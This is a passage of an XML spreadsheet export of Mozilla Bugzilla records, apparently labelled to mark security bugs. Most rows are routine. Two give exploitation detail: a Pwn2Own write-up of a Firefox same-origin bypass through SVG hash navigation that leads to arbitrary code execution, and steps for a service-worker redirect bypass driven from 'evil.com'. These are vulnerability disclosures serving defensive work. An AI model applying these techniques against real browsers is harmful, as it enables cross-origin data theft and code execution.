1   nsCSSFrameConstructor::FindPrimaryFrameFor(nsFrameManager*, nsIContent*, nsIFrame**, nsFindFrameHint*) + 237 (nsCSSFrameConstructor.cpp:10865)
2   nsFrameManager::GetPrimaryFrameFor(nsIContent*, int) + 538 (nsFrameManager.cpp:394)
3   PresShell::GetPrimaryFrameFor(nsIContent*) const + 42 (nsPresShell.cpp:4688)
4   nsBoxObject::GetFrame(int) + 102 (nsBoxObject.cpp:141)
5   nsTreeBoxObject::GetTreeBody() + 53 (nsTreeBoxObject.cpp:116)
6   nsTreeBoxObject::GetColumns(nsITreeColumns**) + 17 (nsTreeBoxObject.cpp:234)
7   nsTreeColFrame::InvalidateColumns() + 96 (nsTreeColFrame.cpp:228)
8   nsTreeColFrame::Destroy() + 17 (nsTreeColFrame.cpp:103)
9   nsFrameList::DestroyFrames() + 48 (nsFrameList.cpp:68)
10  nsContainerFrame::Destroy() + 73 (nsContainerFrame.cpp:255)
...</t>
        </is>
      </c>
      <c r="X5185" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5186">
      <c r="A5186" t="n">
        <v>1144988</v>
      </c>
      <c r="B5186" t="inlineStr">
        <is>
          <t>2015-03-18 18:48:22 -0700</t>
        </is>
      </c>
      <c r="C5186" t="inlineStr">
        <is>
          <t>Same-origin bypass via SVG hash navigation (ZDI-CAN-2825)</t>
        </is>
      </c>
      <c r="D5186" t="inlineStr">
        <is>
          <t>2016-07-12 09:49:41 -0700</t>
        </is>
      </c>
      <c r="E5186" t="n">
        <v>1</v>
      </c>
      <c r="F5186" t="n">
        <v>1</v>
      </c>
      <c r="G5186" t="n">
        <v>3</v>
      </c>
      <c r="H5186" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5186" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5186" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5186" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5186" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5186" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5186" t="inlineStr">
        <is>
          <t>[filed bug 1145195 to change svgView() behavior][adv-main37-][adv-esr31.6-][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q5186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5186" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5186" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5186" t="n">
        <v>1</v>
      </c>
      <c r="U5186" t="n">
        <v>0</v>
      </c>
      <c r="V5186" t="n">
        <v>97</v>
      </c>
      <c r="W5186" t="inlineStr">
        <is>
          <t>Created attachment 8579746
moz-poc1.html
From winning Pwn2Own exploit by Mariusz Mlynski [1/2]:
-----
TL;DR
-----
It is possible to bypass the same-origin policy using a mutation event triggered in the middle of a SVG document's hash navigation. This can be exploited to execute script in the context of the internal pdf viewer, whose security principal is not restricted from loading privileged content, which allows web content to execute arbitrary code.
----------------------
1. CROSS-ORIGIN BYPASS
----------------------
In Firefox, short-circuited hash navigations are handled as follows:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; /docshell/base/nsDocShell.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
NS_IMETHODIMP
nsDocShell::InternalLoad(nsIURI * aURI, (...) )
{
(...)
        if (doShortCircuitedLoad) {
            // Save the position of the scrollers.
            nscoord cx = 0, cy = 0;
            GetCurScrollPos(ScrollOrientation_X, &amp;cx);
            GetCurScrollPos(ScrollOrientation_Y, &amp;cy);
            // ScrollToAnchor doesn't necessarily cause us to scroll the window;
            // the function decides whether a scroll is appropriate based on the
            // arguments it receives.  But even if we don't end up scrolling,
            // ScrollToAnchor performs other important tasks, such as informing
            // the presShell that we have a new hash.  See bug 680257.
            rv = ScrollToAnchor(curHash, newHash, aLoadType);
            NS_ENSURE_SUCCESS(rv, rv);
            (...)
            /* This is a anchor traversal with in the same page.
             * call OnNewURI() so that, this traversal will be 
             * recorded in session and global history.
             */
            nsCOMPtr&lt;nsISupports&gt; owner;
            if (mOSHE) {
                mOSHE-&gt;GetOwner(getter_AddRefs(owner));
            }
            // Pass true for aCloneSHChildren, since we're not
            // changing documents here, so all of our subframes are
            // still relevant to the new session history entry.
            //
            // It also makes OnNewURI(...) set LOCATION_CHANGE_SAME_DOCUMENT
            // flag on firing onLocationChange(...).
            // Anyway, aCloneSHChildren param is simply reflecting
            // doShortCircuitedLoad in this scope.
            OnNewURI(aURI, nullptr, owner, mLoadType, true, true, true);
            (...)
            return NS_OK;
        }
(...)
}
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
This code doesn't consider that |ScrollToAnchor| can run script if the following conditions are met:
1. A SVG document is being navigated;
2. A DOMAttrModified mutation listener is registered on the SVG document's documentElement;
3. The hash modifies a SVGViewAttribute through the use of a SVG ViewSpec, such as "svgView(viewBox(0,0,0,0))".
In such case, the following code path is taken to trigger a mutation event:
nsDocShell::InternalLoad
nsDocShell::ScrollToAnchor
PresShell::GoToAnchor
mozilla::SVGFragmentIdentifier::ProcessFragmentIdentifier
mozilla::SVGFragmentIdentifier::ProcessSVGViewSpec
nsSVGViewBox::SetBaseValueString
nsSVGElement::DidChangeViewBox
nsSVGElement::DidChangeValue
mozilla::dom::Element::SetAttrAndNotify
The event handler can perform a synchronous navigation to a cross-origin document, affecting the state of the docshell and its corresponding history entry stored in nsDocShell::mOSHE. When the handler returns, the security principal associated with the docshell's current history entry (which is cross-origin at this point) is fetched in the mOSHE-&gt;GetOwner call. Then, |OnNewURI| combines the URI of the SVG document and the cross-origin owner into a new history entry, which is added to the session history. This allows an attacker to load a principal-inheriting data:image/svg+xml,* URI with the hijacked principal during a subsequent navigation to the newly added history entry (|history.go(2)| in the exploit).</t>
        </is>
      </c>
      <c r="X5186" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5187">
      <c r="A5187" t="n">
        <v>1450345</v>
      </c>
      <c r="B5187" t="inlineStr">
        <is>
          <t>2018-03-30 13:26:59 -0700</t>
        </is>
      </c>
      <c r="C5187" t="inlineStr">
        <is>
          <t>prevent form submission for &lt;button&gt; too</t>
        </is>
      </c>
      <c r="D5187" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:27 -0800</t>
        </is>
      </c>
      <c r="E5187" t="n">
        <v>1</v>
      </c>
      <c r="F5187" t="n">
        <v>1</v>
      </c>
      <c r="G5187" t="n">
        <v>2</v>
      </c>
      <c r="H5187" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5187" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J5187" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5187" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5187" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5187" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5187" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5187" t="inlineStr"/>
      <c r="Q5187" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5187" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5187" t="inlineStr">
        <is>
          <t>Thunderbird 61.0</t>
        </is>
      </c>
      <c r="T5187" t="n">
        <v>1</v>
      </c>
      <c r="U5187" t="n">
        <v>0</v>
      </c>
      <c r="V5187" t="n">
        <v>7</v>
      </c>
      <c r="W5187" t="inlineStr">
        <is>
          <t>Created attachment 8964028
bugXXX_prevent_form_sub.patch
+++ This bug was initially created as a clone of Bug #1419417 +++
As reported in bug 1419417, form submission can still happen in Thunderbird. I thought that was disabled, but it turns out we missed the one case, that you can submit a form with &lt;button type="submit"&gt; too. 
Normally, as soon as the user clicks any form element we just open the for action in the browser (as a GET). This is how it's been for ages. The idea is to prevent users from bing tricked into submitting info to wrong places. 
As a test case, try the eml in https://bugzilla.mozilla.org/attachment.cgi?id=8930485. Once entering the form area, the browser should open and by that prevent further interaction with the form inside thunderbird.</t>
        </is>
      </c>
      <c r="X5187" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5188">
      <c r="A5188" t="n">
        <v>1256754</v>
      </c>
      <c r="B5188" t="inlineStr">
        <is>
          <t>2016-03-15 11:20:48 -0700</t>
        </is>
      </c>
      <c r="C5188" t="inlineStr">
        <is>
          <t>Increase context menu items line-height when accessed through touch</t>
        </is>
      </c>
      <c r="D5188" t="inlineStr">
        <is>
          <t>2022-12-08 13:22:20 -0800</t>
        </is>
      </c>
      <c r="E5188" t="n">
        <v>1</v>
      </c>
      <c r="F5188" t="n">
        <v>1</v>
      </c>
      <c r="G5188" t="n">
        <v>2</v>
      </c>
      <c r="H5188" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5188" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5188" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5188" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5188" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5188" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5188" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5188" t="inlineStr">
        <is>
          <t>[photon-visual][p2]</t>
        </is>
      </c>
      <c r="Q5188" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5188" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5188" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5188" t="n">
        <v>1</v>
      </c>
      <c r="U5188" t="n">
        <v>0</v>
      </c>
      <c r="V5188" t="n">
        <v>22</v>
      </c>
      <c r="W5188" t="inlineStr">
        <is>
          <t>Created attachment 8730844
Firefox_Touch_Context_Menu.gif
More and more Windows devices provide a touch screen. However, our line-height in lists is rather narrow to easily touch the option one wants. This is the case for context menus (e.g. opening a link in a new tab) or on panels such as bookmarks or history.
Increasing the line-height on touch devices by 20% should make them easier to touch.</t>
        </is>
      </c>
      <c r="X5188" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5189">
      <c r="A5189" t="n">
        <v>814203</v>
      </c>
      <c r="B5189" t="inlineStr">
        <is>
          <t>2012-11-21 14:59:41 -0800</t>
        </is>
      </c>
      <c r="C5189" t="inlineStr">
        <is>
          <t>implement &amp; test redesigned /new page</t>
        </is>
      </c>
      <c r="D5189" t="inlineStr">
        <is>
          <t>2013-05-02 16:31:58 -0700</t>
        </is>
      </c>
      <c r="E5189" t="n">
        <v>1</v>
      </c>
      <c r="F5189" t="n">
        <v>1</v>
      </c>
      <c r="G5189" t="n">
        <v>5</v>
      </c>
      <c r="H5189" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5189" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5189" t="inlineStr">
        <is>
          <t>Pages &amp; Content</t>
        </is>
      </c>
      <c r="K5189" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5189" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5189" t="inlineStr">
        <is>
          <t>[u=user c=bedrock p=1]</t>
        </is>
      </c>
      <c r="Q5189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5189" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5189" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5189" t="n">
        <v>1</v>
      </c>
      <c r="U5189" t="n">
        <v>0</v>
      </c>
      <c r="V5189" t="n">
        <v>60</v>
      </c>
      <c r="W5189" t="inlineStr">
        <is>
          <t>Filing this as an implementation bug for the designs in bug 814202. Jennifer, please share any details about timing or testing methods that you think would be relevant.
Design work will start next week, so more to come on that.
Thanks!</t>
        </is>
      </c>
      <c r="X5189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5190">
      <c r="A5190" t="n">
        <v>1680793</v>
      </c>
      <c r="B5190" t="inlineStr">
        <is>
          <t>2020-12-04 09:34:57 -0800</t>
        </is>
      </c>
      <c r="C5190" t="inlineStr">
        <is>
          <t>Geolocation sharing state overwrites WebRTC sharing state</t>
        </is>
      </c>
      <c r="D5190" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:21 -0800</t>
        </is>
      </c>
      <c r="E5190" t="n">
        <v>1</v>
      </c>
      <c r="F5190" t="n">
        <v>1</v>
      </c>
      <c r="G5190" t="n">
        <v>2</v>
      </c>
      <c r="H5190" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5190" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5190" t="inlineStr">
        <is>
          <t>Site Identity</t>
        </is>
      </c>
      <c r="K5190" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5190" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5190" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5190" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5190" t="inlineStr">
        <is>
          <t>[adv-main85+]</t>
        </is>
      </c>
      <c r="Q5190" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5190" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5190" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T5190" t="n">
        <v>1</v>
      </c>
      <c r="U5190" t="n">
        <v>0</v>
      </c>
      <c r="V5190" t="n">
        <v>13</v>
      </c>
      <c r="W5190" t="inlineStr">
        <is>
          <t>When we have an active sharing state for WebRTC and then begin sharing geolocation, `updateBrowserSharing` resets the webRTC sharing state: `tab._sharingState.webRTC = null`:
https://searchfox.org/mozilla-central/rev/6bb59b783b193f06d6744c5ccaac69a992e9ee7b/browser/base/content/tabbrowser.js#1392
This results in the microphone/camera indicator in the tab, the identity section and  in the siteIdentity  popup permission list to disappear. The global WebRTC indicator is not affected.
In theory this could be abused, but it's rather an edge case. The user would have to first accept the webRTC sharing permission prompt and then the geolocation prompt.</t>
        </is>
      </c>
      <c r="X5190" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5191">
      <c r="A5191" t="n">
        <v>1408776</v>
      </c>
      <c r="B5191" t="inlineStr">
        <is>
          <t>2017-10-15 11:33:21 -0700</t>
        </is>
      </c>
      <c r="C5191" t="inlineStr">
        <is>
          <t>Update JS dependencies, Oct 2017</t>
        </is>
      </c>
      <c r="D5191" t="inlineStr">
        <is>
          <t>2017-10-17 10:56:37 -0700</t>
        </is>
      </c>
      <c r="E5191" t="n">
        <v>1</v>
      </c>
      <c r="F5191" t="n">
        <v>1</v>
      </c>
      <c r="G5191" t="n">
        <v>7</v>
      </c>
      <c r="H5191" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5191" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5191" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5191" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5191" t="inlineStr"/>
      <c r="Q5191" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5191" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5191" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5191" t="n">
        <v>1</v>
      </c>
      <c r="U5191" t="n">
        <v>0</v>
      </c>
      <c r="V5191" t="n">
        <v>4</v>
      </c>
      <c r="W5191" t="inlineStr">
        <is>
          <t>The Neutrino upgrade will be causing some dependency churn. To make it easier to determine breakage caused by general updates (from refreshing yarn.lock) vs those relating to Neutrino, we should update the other JS deps beforehand.</t>
        </is>
      </c>
      <c r="X5191" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5192">
      <c r="A5192" t="n">
        <v>1338495</v>
      </c>
      <c r="B5192" t="inlineStr">
        <is>
          <t>2017-02-10 03:24:13 -0800</t>
        </is>
      </c>
      <c r="C5192" t="inlineStr">
        <is>
          <t>Increase maximum kafka consumer fetch size</t>
        </is>
      </c>
      <c r="D5192" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E5192" t="n">
        <v>1</v>
      </c>
      <c r="F5192" t="n">
        <v>1</v>
      </c>
      <c r="G5192" t="n">
        <v>6</v>
      </c>
      <c r="H5192" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5192" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J5192" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K5192" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5192" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5192" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5192" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5192" t="inlineStr"/>
      <c r="Q5192" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5192" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5192" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5192" t="n">
        <v>1</v>
      </c>
      <c r="U5192" t="n">
        <v>0</v>
      </c>
      <c r="V5192" t="n">
        <v>1</v>
      </c>
      <c r="W5192" t="inlineStr">
        <is>
          <t>The kafka consumer has a setting that limits the maximum amount of data per-partition that can be fetched from the server. This must be higher than the maximum size of a ping, otherwise the job will raise an error.</t>
        </is>
      </c>
      <c r="X5192" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5193">
      <c r="A5193" t="n">
        <v>177449</v>
      </c>
      <c r="B5193" t="inlineStr">
        <is>
          <t>2002-10-30 03:34:57 -0800</t>
        </is>
      </c>
      <c r="C5193" t="inlineStr">
        <is>
          <t>When changing email address, old email address confirmation is case sensitive</t>
        </is>
      </c>
      <c r="D5193" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E5193" t="n">
        <v>1</v>
      </c>
      <c r="F5193" t="n">
        <v>1</v>
      </c>
      <c r="G5193" t="n">
        <v>4</v>
      </c>
      <c r="H5193" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5193" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5193" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K5193" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L5193" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5193" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5193" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5193" t="inlineStr"/>
      <c r="Q5193" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5193" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5193" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5193" t="n">
        <v>1</v>
      </c>
      <c r="U5193" t="n">
        <v>0</v>
      </c>
      <c r="V5193" t="n">
        <v>8</v>
      </c>
      <c r="W5193" t="inlineStr">
        <is>
          <t>I recently changed my email address that bugzilla has.  It was a fairly nice
process except that I was asked to enter my old email address as confirmation as
the last step.  That email address seems to be case sensitive (although email
addresses in general are not)  Bugzilla had me down with a capital O in my email
address and I tried to confirm without.  After I copied and pasted the address I
figured out what happened, but it was confusing.</t>
        </is>
      </c>
      <c r="X5193" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5194">
      <c r="A5194" t="n">
        <v>1467852</v>
      </c>
      <c r="B5194" t="inlineStr">
        <is>
          <t>2018-06-08 10:36:19 -0700</t>
        </is>
      </c>
      <c r="C5194" t="inlineStr">
        <is>
          <t>same-origin bypass using service worker and redirects due to incorrect redirected synthesized taint handling</t>
        </is>
      </c>
      <c r="D5194" t="inlineStr">
        <is>
          <t>2019-08-07 16:56:53 -0700</t>
        </is>
      </c>
      <c r="E5194" t="n">
        <v>1</v>
      </c>
      <c r="F5194" t="n">
        <v>1</v>
      </c>
      <c r="G5194" t="n">
        <v>3</v>
      </c>
      <c r="H5194" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5194" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5194" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5194" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5194" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5194" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5194" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5194" t="inlineStr">
        <is>
          <t>[adv-main61+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5194" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5194" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5194" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T5194" t="n">
        <v>1</v>
      </c>
      <c r="U5194" t="n">
        <v>0</v>
      </c>
      <c r="V5194" t="n">
        <v>25</v>
      </c>
      <c r="W5194" t="inlineStr">
        <is>
          <t>In bug 1222008 we added a flag that specifies that the tainting on a particular LoadInfo has been synthesized by a service worker.  This allows the service worker to override the tainting that would have been otherwise set for the response.
For example, if a page does `fetch(crossOriginURL)`, we start tainting the response immediately when we see the cross-origin URL.  The intercepting service worker, though, can do `e.respondWith(fetch(sameOriginURL))` which overrides the tainting back to a same-origin "basic" response.  The flag added in bug 1222008 makes sure our security code doesn't then come along and force the tainting back to something else.
The problem, though, is we are currently copying the flag when a redirected channel's LoadInfo is created:
https://searchfox.org/mozilla-central/rev/c621276fbdd9591f52009042d959b9e19b66d49f/netwerk/base/LoadInfo.cpp#399
I believe this means probably means its possible to bypass same-origin policy and read no-cors opaque responses by doing something like:
1. evil.com registers a service worker
2. evil.com makes some request that will be intercepted by the SW
3. The SW responds with a redirect status code and Location header pointing at a private resource on good.com.  This sets the synthesized flag.
4. The redirect is initiated and re-enters the SW, but the SW does not call respondWith().  (This incorrectly preserves the synthesized flag from 4.)
5. The normal network response retrieves good.com's resource, but is returned as a basic response because the synthesized flag from 4 is still set.
I'll see if I can write a test that demonstrates this.</t>
        </is>
      </c>
      <c r="X5194" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5195">
      <c r="A5195" t="n">
        <v>1525637</v>
      </c>
      <c r="B5195" t="inlineStr">
        <is>
          <t>2019-02-06 09:20:00 -0800</t>
        </is>
      </c>
      <c r="C5195" t="inlineStr">
        <is>
          <t>SMTP access for the lando-api-worker [DEV] container</t>
        </is>
      </c>
      <c r="D5195" t="inlineStr">
        <is>
          <t>2019-03-29 08:02:04 -0700</t>
        </is>
      </c>
      <c r="E5195" t="n">
        <v>1</v>
      </c>
      <c r="F5195" t="n">
        <v>1</v>
      </c>
      <c r="G5195" t="n">
        <v>7</v>
      </c>
      <c r="H5195" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5195" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J5195" t="inlineStr">
        <is>
          <t>Infrastructure</t>
        </is>
      </c>
      <c r="K5195" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5195" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5195" t="inlineStr"/>
      <c r="Q5195" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5195" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5195" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5195" t="n">
        <v>1</v>
      </c>
      <c r="U5195" t="n">
        <v>0</v>
      </c>
      <c r="V5195" t="n">
        <v>1</v>
      </c>
      <c r="W5195" t="inlineStr">
        <is>
          <t>The lando-api-worker [DEV] container needs access to a SMTP server so that the worker can send notification emails to Firefox developers.
All recipients of the emails from this service will have valid Mozilla LDAP entries.  Bounces and complaints should be low.  Emails will only be sent in the case of a Transplant service error so traffic is expected to be low, too.
For the "From:" address field it would be preferable to use the Phabricator return email address, mozphab-prod@mozilla.com.  However we can use a different return address for this service if using the Phabricator address is difficult to do.
After the SMTP server has been deployed the [DEV] worker container needs to have some environment variables set.
* unset this variable: `MAIL_SUPPRESS_SEND`
* `LANDO_WEBSITE_URL=https://lando.devsvcdev.mozaws.net/`
* `MAIL_SERVER=some.mail.hostname`
* `MAIL_PORT=somevalidsmtpportnumber`
See the [Lando API README](https://github.com/mozilla-conduit/lando-api/blob/master/README.md) for descriptions of these settings.</t>
        </is>
      </c>
      <c r="X5195" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5196">
      <c r="A5196" t="n">
        <v>938051</v>
      </c>
      <c r="B5196" t="inlineStr">
        <is>
          <t>2013-11-13 01:41:20 -0800</t>
        </is>
      </c>
      <c r="C5196" t="inlineStr">
        <is>
          <t>Intermittent failure in test_delete_contact</t>
        </is>
      </c>
      <c r="D5196" t="inlineStr">
        <is>
          <t>2013-11-19 07:01:19 -0800</t>
        </is>
      </c>
      <c r="E5196" t="n">
        <v>1</v>
      </c>
      <c r="F5196" t="n">
        <v>1</v>
      </c>
      <c r="G5196" t="n">
        <v>6</v>
      </c>
      <c r="H5196" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5196" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5196" t="inlineStr">
        <is>
          <t>Gaia::UI Tests</t>
        </is>
      </c>
      <c r="K5196" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5196" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5196" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5196" t="inlineStr">
        <is>
          <t>RESOLVED</t>
